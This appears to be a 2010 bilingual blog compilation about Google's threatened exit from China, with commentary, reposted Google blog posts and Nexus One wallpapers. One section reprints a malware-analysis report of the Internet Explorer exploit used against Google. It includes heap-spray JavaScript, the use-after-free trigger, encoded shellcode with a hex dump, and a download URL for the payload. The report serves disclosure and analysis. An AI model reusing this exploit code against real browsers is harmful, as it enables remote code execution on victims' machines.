Google gone

This is a memorible day. Once I use Google to search information for at least 10 times everyday. He’s now finally gone.

Almost each dormate and dormates in the next dormitory just know baidu when I first in this school. But now they believe Google is better then Baidu and they all turned to use Google now. I told them Baidu is only for the guy who know nothing but entertaments and jokes. They just hang around the internet with no purpose.

Something is true from the fact that if you want to find the official information, you have to be more patient to look for it from the result provided by baidu. But Google is different. There is no other explaination for the question why baidu don’t put the most official information on the first place. Because baidu don’t consider you should know facts from origin. It may want you to tell the true or express your opinion upon other opinion. But can it possible to tell the true from this stupit way?

I always in favour of the attitude of Google towards the internet information. The pure information should provide for anyone first because you and me have the right to know what is a thing on earth.

In any case, the good new is you can still access to Google from the domain of HK, called the new Google home. Once upon a time, many and many strong men have devote themselves into this game making a wonderful situation in China with many new technoledge.

Now, http://www.google.cn/music/homepage is still remain normal when I’m writing this page. Can this address remind you the history of www.google.cn? Let’s pray for god and stay together around this site: http://www.google.com/prc/report.html.

Google (谷歌)中国的博客网志:澄清不实的传言

将具有纪念性及迷雾中的里程碑性的文章抄载如下:

2010年1月19日 下午 06:03:00
发表者:刘允 杨文洛

过去几天里,我们看到有很多关于谷歌中国以及谷歌员工的不真实的传言,一些报道称我们已经关闭了在中国的办公室,还有一些报道称我们在中国的员工已经接到通知将于近期离职。这些都是不真实的。目前,谷歌中国的员工同过去一样在办公室正常工作,讨论产品开发,与客户进行沟通。尽管谷歌总部管理层近期宣布他们将会在未来的几个星期与中国政府就一些事宜进行商讨,谷歌中国的员工们仍在一如既往地努力向我们的用户和合作伙伴提供最好的产品和服务,用户和合作伙伴对谷歌是非常重要的。

原文链接:http://googlechinablog.com/2010/01/blog-post_19.html

显然,Google开始不撒娇了。

Google will not withdraw from China

一个星期前,Official Google Blog突然出现了一篇透露Google考虑撤离中国的文章,很多人都相信Google内部是经过慎重的考虑才公布消息的,甚至有人认为考虑相当于准备。于是在北京中关村的谷歌总部前的Google Logo上出现了以下一幕:

很多人送上很多鲜花,给谷歌送行,网上也接连出现了很多哀悼谷歌离开的场景,讨论着谷歌离开中国以后的得与失。

1月14日,中国外交部发言人姜瑜回答关于谷歌的提问时表示,中国的互联网是开放的,中国政府鼓励互联网的发展,也努力为互联网的健康发展营造良好环境,中国欢迎国际互联网企业在中国依法开展业务。

谷歌在中国接二连三感到郁闷,前一阵子的Google数字图书馆扫描了中国作家的著作遭到中国作协的严重抗议闹得沸沸扬扬,作出了口头道歉还不是,还要求Google作出书面道歉,否则要诉讼法庭。这件事我想对Google的打击可够大的了,Google在官方的英文和中文博客上都抒发了自己宏图伟志。当时我也想,Google的出发点很好,让世界的知识都尽量融合在一起,让书本知识真正不受地域的限制,如果事成了尤其会让所有消费者感到兴奋,但这事的落实在国外不好说,在中国肯定会遇到顽强的抵抗。中国的作家和外国的不同,大多生活清贫,收入来源单一,脑子里满是墨水倒出来以后却不值几个钱,如果就这样将他们的书全部上线,那人人都不用买纸质书了,这就相当于截断了中国作家们活路,他们不和Google拼死拼活才怪呢。最近Google遭到黑客的严重攻击应该是“Google考虑退出中国”的导火线,黑客的攻击以致其知识产权被盗,Google高层再也忍不住中国的恶劣环境,说了一些气话出来。但是黑客的攻击对象并不单是Google,还有其他大公司。

中国是一个庞大的市场,如果Google最终冒失退出中国以后Google自身的损失肯定很大,虽然有人分析说Google在中国营销的利润在总利润占的百分比很少,但是所有人都知道中国现在正在快速发展,现在的百分比少不代表以后少,这是一个强烈的诱惑,是一个巨大的机遇,我想Google这样的大公司不会因为少少的损失或者郁闷而离开中国的。

于是在今天,曾经闹翻天,曾经导致谷歌中国的员工心神不定,曾经导致一些人匆忙备份Gmail邮件,出现了戏剧性的发展,于今天下午18时,在宣布退出中国市场、员工停止工作一周后,美国网络巨头谷歌再次表示在中国的业务恢复正常运转。同时Google 首席执行官埃里克·施密特(Eric Schmidt)透露,公司还在与中国政府就此事进行商谈,他并不排除谷歌继续留在中国的可能性,并以极富感情色彩的语言说“我们爱中国和中国人民”。施密特仍然表示,Google 公司认为在中国营运对每个人都有好处——对 Google 和中国民众都是如此。

我想施密特说出了要点,Google需要中国,中国也确实需要Google。

事件发生之初有人猜测Google退出中国是谣言,飞象网CEO项立刚认为:“Google放弃中国运营不过是一种心理战”,“对于世界和互联网业而言,没有中国,就缺少一个巨大的市场。”所有事情发生到现在,事实渐渐明朗,Google要以退出中国作为砝码,威胁中国政府给以更大的权限以保持Google的企业文化宗旨,然而,Google并没有真正打算撤离中国。

eBay没能竞争过淘宝网,雅虎也以被阿里巴巴收购完成了自己在中国并不精彩的亮相,这些外企的水土不服证明了,Google在中国发展,真正需要将正直的企业文化以及中国特殊的国情两相兼顾或者融合,才能最终打败百度的不正义。

Nexus One自带的壁纸和铃声!

要说2010年最令人震撼的手机,一开春就发布的Google Nexus One一定是其中之一。Google刚刚在日前发布了旗下第一款挂上Google品牌的Android手机Nexus One,随即马上开放网站销售手机,让我们有机会亲自一睹Nexus One的风采。

现在给大家带来了Nexus One自带的壁纸和铃声,全部是ogg格式的。

来几张欣赏一下先:

三张非常带有Google色彩的

风景tastes

不知道为什么都喜欢草的特写

还有很多张供大家欣赏……

点此下载

上个月用于攻击Google等公司的IE攻击代码

引自Solidot.org上一文:

上个月用于攻击Google等公司的IE攻击代码于1月14日递交到恶意程序分析网站Wepawet
攻击主要依赖于运行在Windows XP上的Internet Explorer 6,但经过修改它也可能适用于IE7等较新版本的IE浏览器。当被攻击者点击了恶意网页后,攻击者能使用该代码在受害者的机器上运行未许可的软件。微软已就这一漏洞发布了安全通知,它的例行安全补丁发布定在2月9日,但鉴于情况紧急,软件巨人也可能会提前发布修复补丁。安全研究人员指出,Windows Vista或Windows 7上利用这一漏洞难度更大,但不是没有可能。德国联邦信息安全办公室甚至建议用户使用非IE浏览器。

以下是copyWepawet上的分析报告:

Analysis report for ccc[1].ht_

Sample Overview

File ccc[1].ht_
MD5 1aea206aa64ebeabb07237f1e2230d0f
Analysis Started 2010-01-14 13:05:32
Report Generated 2010-01-14 13:05:39
Jsand version 1.03.02

Detection results

Detector Result
Jsand 1.03.02 suspicious

Warning:

  • When analyzing a file (rather than a URL), Jsand does not examine external resources, such as iframes and scripts. In addition, properties such as document.location, document.referer, and document.cookie, which are sometimes used by malicious scripts, are not set.

This may affect the detection of malicious code.

Exploits

No exploits were identified.

Deobfuscation results

Evals

  • var n = unescape("%u0c0d%u0c0d"); 
    while (n.length <= 524288)n += n; 
    n = n.substring(0, 524269 - sc.length); 
    var x = new Array(); 
    for (var i = 0; i < 200; i ++ ){ 
      x[i] = n + sc; 
    } 
    

    (repeated 1 time)

Writes

  • <html><script>var sc = unescape(" 
    %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 
    %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 
    %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 
    %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 
    %ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8 
    %u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2 
    %ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f 
    %udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7 
    %ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727 
    %u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6 
    %u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923 
    %ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2 
    %ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8 
    %u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8 
    %ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820 
    %udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8 
    %u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854 
    %ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84 
    %ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4 
    %ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153 
    %u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30 
    %ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e 
    %u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b 
    %u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb 
    %u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c 
    %u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498 
    %ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0 
    %ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc 
    %u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8 
    %u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038 
    %ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e 
    %u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727 
    %u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703 
    %uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653 
    %udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5 
    %u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb 
    %ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be 
    %uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7 
    %ubcb9%ub2f6%ubfa8%u00d8"); 
    var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, 
    238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, 
    728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364, 
    350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 
    805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693, 
    322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833, 
    224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224, 
    735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, 
    735, 651, 427, 770, 301, 805, 693, 413, 875); 
    var arr = new Array; 
    for (var i = 0; i < sss.length; i ++ ){ 
      arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" 
      ); 
      cc = cc.replace(/@/g, ","); 
      eval(cc); 
      var x1 = new Array(); 
      for (i = 0; i < 200; i ++ ){ 
        x1[i] = document.createElement("COMMENT"); 
        x1[i].data = "abc"; 
      } 
      ; 
      var e1 = null; 
      function ev1(evt){ 
        e1 = document.createEventObject(evt); 
        document.getElementById("sp1").innerHTML = ""; 
        window.setInterval(ev2, 50); 
      } 
      function ev2(){ 
        p = " 
    \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d 
    \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d 
    \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d"; 
        for (i = 0; i < x1.length; i ++ ){ 
          x1[i].data = p; 
        } 
        ; 
        var t = e1.srcElement; 
      } 
    </script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html> 
    

    (repeated 1 time)

Network Activity

Requests

URL
file://ccc[1].ht_

ActiveX controls

No objects/controls.

Shellcode and Malware

Hexadecimal ASCII
90 90 eb 19 5b 4b 90 33  c9 90 80 7b 01 e9 75 01 
c3 66 b9 7b 04 80 34 0b  d8 e2 fa eb 05 e8 e2 ff 
ff ff 31 39 db d8 d8 87  bc 79 e8 d8 d8 d8 53 98 
d4 53 a8 c4 75 53 b0 d0  53 2f b2 d7 81 30 59 db 
d8 d8 48 3a 20 b0 eb ea  d8 d8 b0 8d ab bd aa 8c 
53 9e d4 30 37 da d8 d8  53 30 b2 d9 81 30 b9 db 
d8 d8 3a 21 b0 b7 b6 d8  d8 b0 ad aa b4 b5 8c 53 
9e d4 30 08 da d8 d8 53  30 b2 d9 81 30 9a db d8 
d8 3a 21 b0 b4 eb ea d8  b0 ab b0 bd b4 8c 53 9e 
d4 30 69 da d8 d8 53 30  b2 d9 81 30 fb db d8 d8 
3a 21 59 34 d8 d9 d8 d8  53 04 59 1b 58 d8 d8 d8 
b2 d8 b2 c2 8b b2 d8 27  8e 9c eb 18 98 58 e4 db 
d8 ad 21 51 5e 48 d8 d8  d8 1f dc db 84 b9 f6 bd 
1f 9c db dc a0 bd d8 d8  eb 11 89 89 8b 8f 89 eb 
18 53 9e 98 30 86 da d8  d8 5b 20 d8 d7 5d a7 d9 
d8 d8 b2 d8 b2 d8 b2 db  b2 d8 b2 da b0 d8 d8 d8 
18 8b 53 9e fc 30 e5 da  d8 d8 5b 20 27 d7 5c 86 
d9 d8 d8 51 9e b8 b2 d8  88 27 8e f0 51 9e bc 53 
5e 48 d8 d8 d8 1f dc db  84 ba f6 bd 1f 9c db dc 
a0 bd d8 d8 b2 d8 b2 d8  b2 da b2 d8 b2 d8 b0 d8 
d8 d8 98 8b 53 9e fc 30  23 d9 d8 d8 5b 20 27 d7 
5c c4 d9 d8 d8 51 5e 5c  d8 d8 d8 51 46 54 d8 d8 
d8 53 9e b8 b2 d8 b2 d8  b2 d8 53 9e b8 88 27 8e 
e0 1f 9e a8 d8 d8 d8 d8  1f 9e ac d8 d8 d8 d8 59 
1f d8 da d8 d8 eb 03 53  86 bc b2 d8 55 9e a8 88 
b0 d8 dc d8 d8 8f 27 ae  b8 27 8e dc eb 11 61 d8 
dc d8 d8 58 a4 d7 27 4d  ac d4 58 a4 d7 27 d8 ac 
dd 58 ac d7 27 4d 3a 33  53 1b f5 d8 dc d8 d8 5b 
20 d8 a7 db 51 86 a8 b2  d8 55 9e ac 88 27 ae a8 
8f 27 6e 5c d8 d8 d8 27  8e e8 59 33 d8 dc d8 d8 
5b 23 d8 a7 7d 27 ae b8  27 8e ec 27 6e 5c d8 d8 
d8 27 8e ec 53 5e 48 d8  d8 d8 53 46 54 d8 d8 d8 
1f dc db 84 b9 f6 bd 8b  27 8e f4 53 66 54 d8 d8 
d8 53 5e 48 d8 d8 d8 1f  dc df 84 ba f6 bd 59 34 
d8 d9 d8 d8 53 04 b0 d8  d9 d8 d8 8b b0 d8 d9 d8 
d8 8f b2 d8 b2 d8 27 8e  c4 53 23 eb 18 eb 03 59 
34 d8 da d8 d8 53 14 5b  20 8c a5 d0 51 c4 d9 5b 
18 dc 33 2b 53 14 53 01  5b 1b c8 eb 18 88 89 8b 
88 88 88 88 88 88 8f 88  88 53 9e d0 30 2f d8 d8 
d8 53 a6 e4 30 ec d9 d8  d8 30 ef d8 d8 d8 b0 bb 
ae af d8 b0 ab b0 bc b7  8c 53 9e d4 30 6e d8 d8 
d8 51 9e e4 bc 79 dc d8  d8 d8 55 78 b8 27 27 27 
b2 bd 27 ae e4 53 9e c8  30 42 d8 d8 d8 eb 03 8b 
8b 8b 8b 27 08 30 3d d8  d8 d8 59 34 d8 d9 d8 d8 
53 24 5b 1f dc 1f df ea  ac 49 d4 1f 9f dc bb 51 
09 97 1f 9f d0 78 bd 4f  13 1f 9f d4 89 98 62 a7 
1f 9f c8 e6 c5 6e e1 1f  9f cc 60 b1 0c c3 1f 9f 
c0 66 a7 be 78 1f 9f c4  24 71 ef 75 1f 9f f8 40 
d2 c8 20 bc 79 e8 d8 d8  d8 53 98 d4 53 a8 c4 75 
53 b0 d0 53 2f 51 8e bc  b2 dc 81 30 7b d8 d8 d8 
48 3a 20 b0 eb ea d8 d8  b0 8d ab bd aa 8c 53 de 
30 ca d8 d8 d8 53 30 b2  dd 81 30 5c d8 d8 d8 3a 
21 eb 27 8f 27 8e dc 58  e0 30 58 e0 31 ad c9 59 
a0 dd 48 48 48 48 ac d0  53 27 8d 53 34 55 98 dd 
27 38 30 e0 d8 d8 d8 1b  58 e0 30 58 e0 31 ad c9 
59 a0 dd 48 48 48 48 ac  3f b0 d0 d2 d8 d8 55 98 
dd 27 38 30 cf d8 d8 d8  1b 30 c9 d8 d8 d8 60 c9 
d9 dc 58 1a d4 d8 33 da  80 1b 30 21 27 27 27 83 
1e df 60 51 87 d9 be 1f  9f dd 27 38 1b 8b 53 04 
8b b2 98 b0 d8 c8 d8 d8  8f 53 9e f8 30 5e 27 27 
27 80 1b 89 8e 53 ad e4  53 ac f6 a0 db 2d 8e 53 
ae f8 db 2d eb 11 91 99  75 db 1d eb 03 d7 66 c8 
e2 0e ac d0 19 13 df db  02 98 33 29 e3 c7 ad 3f 
86 53 86 fc db 05 be 53  d4 93 53 86 c4 db 05 53 
dc 53 db 1d 73 86 81 1b  30 c2 24 27 27 6a 2a 3a 
2c 6a ee d7 cb 28 90 a3  e5 ea ac 49 d4 5d 07 77 
63 bb 51 09 97 89 98 62  a7 df 4a fa a8 c6 7c bc 
37 4b ea 3c 4c 56 cb d2  74 a1 e1 3e 40 1c 55 c7 
ac 8f be d5 27 9b 66 74  03 40 d2 c8 20 58 0e 77 
42 23 8b cd be b0 ac ac  a8 e2 f7 f7 bc bd b5 b7 
e9 f6 be ac a8 b9 bb bb  bd ab ab f6 bb bb f7 bc 
bd b5 b7 f7 b9 bc f6 b2  a8 bf d8 00 
....[K.3...{..u.
.f.{..4.........
..19.....y....S.
.S..uS..S/...0Y.
..H: ...........
S..07...S0...0..
..:!...........S
..0....S0...0...
.:!...........S.
.0i...S0...0....
:!Y4....S.Y.X...
.......'.....X..
..!Q^H..........
................
.S..0....[ ..]..
................
..S..0....[ '.\.
...Q.....'..Q..S
^H..............
................
....S..0#...[ '.
\....Q^\...QFT..
.S........S...'.
...............Y
.......S....U...
......'..'....a.
...X..'M..X..'..
.X..'M:3S......[
 ...Q....U...'..
.'n\...'..Y3....
[#..}'..'..'n\..
.'..S^H...SFT...
........'..SfT..
.S^H..........Y4
....S...........
......'..S#....Y
4....S.[ ...Q..[
..3+S.S.[.......
.........S..0/..
.S..0....0......
.........S..0n..
.Q...y....Ux.'''
..'..S..0B......
...'.0=...Y4....
S$[......I.....Q
.....x.O......b.
.....n....`.....
.f..x...$q.u...@
.. .y....S..S..u
S..S/Q.....0{...
H: ...........S.
0....S0...0\...:
!.'.'..X.0X.1..Y
..HHHH..S'.S4U..
'80.....X.0X.1..
Y..HHHH.?.....U.
.'80.....0....`.
..X...3...0!'''.
..`Q......'8..S.
.........S..0^''
'....S..S....-.S
...-....u.....f.
..........3)...?
.S.....S..S....S
.S..s...0.$''j*:
,j...(.....I.].w
c.Q....b..J...|.
7K.<LV..t..>@.U.
....'.ft.@.. X.w
B#..............
................
............

Additional (potential) malware:

URL Type Hash Analysis
http://demo1.ftpaccess.cc/demo/ad.jpg N/A N/A

IF Google really go away from us

Official Google Blog上昨天刊登了一篇文章,说Google考虑撤出中国的可能性。我想对于一个以提供最客观的搜索结果给用户为宗旨的公司,的确很难忍受,或者说长期忍受国内的一些政策措施。作为Google的忠实支持者,我不希望Google将来真的离开这个市场,但是如果你是作为政府其中的一个决策人员,作出之前以及现在的某些政策的确有些无奈。我们国家在经济发展上的确得到了很大的成就,不过文化上却似乎并不是很重视。在政府作出的种种针对互联网的政策的背后,我仿佛听到了他们的声音。他们可能会说,对于一个文化体制还不是很完善的国家,我们只能站在维护人民群众的利益的角度去考虑问题,目前过于开放式的文化可能会对人民产生不利的影响,例如就目前来讲网络游戏产业在互联网世界里占据着很大的份额,但是如果不断规范这个行业的道德标准,以致不要让网络游戏成为青少年的毒品,这是一个需要长期探索的问题。又例如,如果我们不对网络搜索行业关于暴力色情的整顿,这些低俗的文化就会腐蚀我们的民族。所以就国内的情况来说,限制过于开放的文化,我们也是迫于无奈。

中国市场一直都被认为是一个很特殊的市场,虽然他的确是一个很大的市场,但是如果一个公司贸然进入的话,可能会输得一败涂地。Google的企业文化令我十分尊重,对于它的每一个产品始终都以用户的需求为根本目标,这与国内的Baidu有很大的差别。我在看来很多企业都经历是这么一个过程,从以客户需求为第一,慢慢转变到大量广告投放为盈利目标,然后慢慢失去创新,最后被用户逐渐忽略。我不认为Baidu是一个好司,但它的确是一间很赚钱的公司。

对于政府对互联网的监督整顿,我是从Youtube被封开始关注的,其中有一段时间放封了,我还以为政府作出了正确的决定,为此我还在那里看了很长一段时间的老友记。不过后来不断发生了很多事情,前段时间央视先后对Google,百度关于色情的曝光,以及最近的Google搜索中国作家图书遭到中国作家协会的强烈反对等等一切事件,从YouTube、Facebook、Twitter、Blogger、WordPress、Google……全世界最好的网站和服务,一个个远离中国,使我感到这好像是改革开放以后新一场文化封锁。对于Official Google Blog也是通过代理才能访问,不过幸好广大Google爱好者的关注才使我看到了这则消息。关于政府对网络行为的监管,南京大学政府管理学院副教授,政治学博士李永刚著有书《我们的防火墙:网络时代的表达与监管》对此作出评论。

每天我都用Gmail收取邮件,用Google reader阅读最新的订阅咨询,用Google docs保存很多文档资料,当然使用最多的是谷歌搜索。首先我认为谷歌的搜索结果是当前无论是百度还是微软的Bing都比不上,让我感触最大的是当你搜索一个出名网站的标题的时候,Google会让网站的主页尽量显示在最前面,而百度和Bing都不是,这不知道是为什么,因为很明显,问题来自于该网站,一切最原始的解答都应该从该网站开始,这是最尊重知识研究的做法。另外,如果Google当真退出中国,我想影响最大的应该不是Google,而是中国,从Google降临在中国开始,有多少企业正在使用着Google提供的各种服务,有多少广告依托于AdWords,因为我们不但只信赖Google的技术先进性,更重要的是它的公正,我们不会害怕Google可能会因为外界的因素动摇它的服务宗旨。

对于我谈论这个的问题这里有几篇很好的文章:三言二拍:Google退出中国三言二拍:他们的防火墙Google可能退出中国市场

最后附上Official Google Blog上的原文以及来自月光博客的翻译 😉 :

A new approach to China

1/12/2010 03:00:00 PM

Like many other well-known organizations, we face cyber attacks of varying degrees on a regular basis. In mid-December, we detected a highly sophisticated and targeted attack on our corporate infrastructure originating from China that resulted in the theft of intellectual property from Google. However, it soon became clear that what at first appeared to be solely a security incident–albeit a significant one–was something quite different.

First, this attack was not just on Google. As part of our investigation we have discovered that at least twenty other large companies from a wide range of businesses–including the Internet, finance, technology, media and chemical sectors–have been similarly targeted. We are currently in the process of notifying those companies, and we are also working with the relevant U.S. authorities.

Second, we have evidence to suggest that a primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists. Based on our investigation to date we believe their attack did not achieve that objective. Only two Gmail accounts appear to have been accessed, and that activity was limited to account information (such as the date the account was created) and subject line, rather than the content of emails themselves.

Third, as part of this investigation but independent of the attack on Google, we have discovered that the accounts of dozens of U.S.-, China- and Europe-based Gmail users who are advocates of human rights in China appear to have been routinely accessed by third parties. These accounts have not been accessed through any security breach at Google, but most likely via phishing scams or malware placed on the users’ computers.

We have already used information gained from this attack to make infrastructure and architectural improvements that enhance security for Google and for our users. In terms of individual users, we would advise people to deploy reputable anti-virus and anti-spyware programs on their computers, to install patches for their operating systems and to update their web browsers. Always be cautious when clicking on links appearing in instant messages and emails, or when asked to share personal information like passwords online. You can read more here about our cyber-security recommendations. People wanting to learn more about these kinds of attacks can read this U.S. government report (PDF), Nart Villeneuve’s blog andthis presentation on the GhostNet spying incident.

We have taken the unusual step of sharing information about these attacks with a broad audience not just because of the security and human rights implications of what we have unearthed, but also because this information goes to the heart of a much bigger global debate about freedom of speech. In the last two decades, China’s economic reform programs and its citizens’ entrepreneurial flair have lifted hundreds of millions of Chinese people out of poverty. Indeed, this great nation is at the heart of much economic progress and development in the world today.

We launched Google.cn in January 2006 in the belief that the benefits of increased access to information for people in China and a more open Internet outweighed our discomfort in agreeing to censor some results. At the time we made clear that “we will carefully monitor conditions in China, including new laws and other restrictions on our services. If we determine that we are unable to achieve the objectives outlined we will not hesitate to reconsider our approach to China.”

These attacks and the surveillance they have uncovered–combined with the attempts over the past year to further limit free speech on the web–have led us to conclude that we should review the feasibility of our business operations in China. We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all. We recognize that this may well mean having to shut down Google.cn, and potentially our offices in China.

The decision to review our business operations in China has been incredibly hard, and we know that it will have potentially far-reaching consequences. We want to make clear that this move was driven by our executives in the United States, without the knowledge or involvement of our employees in China who have worked incredibly hard to make Google.cn the success it is today. We are committed to working responsibly to resolve the very difficult issues raised.

Posted by David Drummond, SVP, Corporate Development and Chief Legal Officer

译文:

像很多知名的公司一样,我们每天都在遭受着或多或少不同程度的网络攻击.在12月中旬,我们监测到了一个从中国来的对google网络基础架构的高智能的目标明确的攻击,其目的是为了盗取google的技术资源.这个一开始被我们仅仅当成是一个重大安全事故的独立事件其实是另有来头的.

第一,这次攻击不仅仅针对google.我们的调查显示至少有20家大的公司,行业领域包括互联网,金融,科技,传媒,化工,都遭受了相似的攻击。我们正在通知这些公司,而且我们正在与美国相关领域的专家进行合作.

第二.我们有证据显示这些黑客的主要目标是获取中国人权活动家(Chinese human rigths activists)们的gmail账号信息.调查显示这些黑客并没有达到他们的目的。只有两个账户似乎被侵入,但是仅得到了账户的一般信息(比如说账户是何时建立的)和邮件的标题,并没有得到邮件的内容。

第三,作为这次调查的另一部分,我们发现很多个在中国,美国,欧洲致力于中国人权发展的用户的gmail账户经常被第三方人士查阅.这些第三方人士并不是通过google的安全漏洞来获取gmail信息的,而是通过网络钓鱼和在用户的计算机上运行恶意软件的方法来获取用户的gmail邮件信息.

我们已经通过这次攻击所收集到的信息对我们的架构做出了修正以提升google和我们用户的安全。对于个人用户来说,我们推荐用户安装知名的杀毒软件和反间谍程序,为自己的操作系统打上最新的补丁,升级自己的浏览器,始终小心处理im和email中的链接,在网络上被要求告知个人信息比如密码时保持警惕。你可以通过这里获取我们关于网络安全的建议。希望了解关于这些网络攻击的种类的人可以阅读这份美国政府报告(pdf), Nart Villeneuve 的blog 还有这份这份关于ghostnet间谍事件的介绍(wiki上有介绍,跟咱中国又有关系).

